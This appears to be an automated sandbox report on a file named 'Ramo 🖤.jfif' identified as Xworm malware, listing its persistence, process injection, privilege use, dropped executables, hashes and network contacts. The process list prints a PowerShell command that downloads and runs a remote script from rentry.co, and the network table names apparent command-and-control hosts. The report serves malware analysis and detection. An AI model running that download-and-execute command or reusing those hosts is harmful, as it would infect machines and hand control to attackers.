Analysis Overview
SHA256
710973dd8cbda36be8352649d6f4c15d875d9625b0baba345b3e86b474a14334
Threat Level: Known bad
The file Ramo 🖤.jfif was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Xworm
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 06:38
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-15 06:38
Reported
2024-06-15 06:41
Platform
win10-20240404-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4704 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4704 set thread context of 1392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\svchost32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\svchost32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Ramo 🖤.jpg"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3dc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/el3rabtweakpc/raw | iex"
C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\x4s.exe
"C:\Users\Admin\AppData\Local\Temp\x4s.exe"
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f4abbf06-ac8c-4d1f-baee-1bc9501f736a}
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:80 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.156:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 156.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | news-accept.gl.at.ply.gg | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 20.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiznon.000webhostapp.com | udp |
| US | 145.14.144.143:443 | wiznon.000webhostapp.com | tcp |
| US | 8.8.8.8:53 | | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tcb2pdvq.fst.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4616-31-0x000001D952CB0000-0x000001D952E72000-memory.dmp
C:\Windows\svchost32.exe
| MD5 | de68372979221ee19e301cd657bdb1b6 |
| SHA1 | 4266ce79f32422735a99259c27749b6d7fbe158e |
| SHA256 | 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a |
| SHA512 | 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16 |
memory/4528-50-0x00000000009E0000-0x0000000000A14000-memory.dmp
memory/4616-51-0x00007FFBBED20000-0x00007FFBBF70C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x4s.exe
| MD5 | 7d333fbc75b9264d3b631861794a7641 |
| SHA1 | 165e2b6ad994fe9bab44154e3812b2e8825dfa76 |
| SHA256 | b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf |
| SHA512 | 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3 |
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
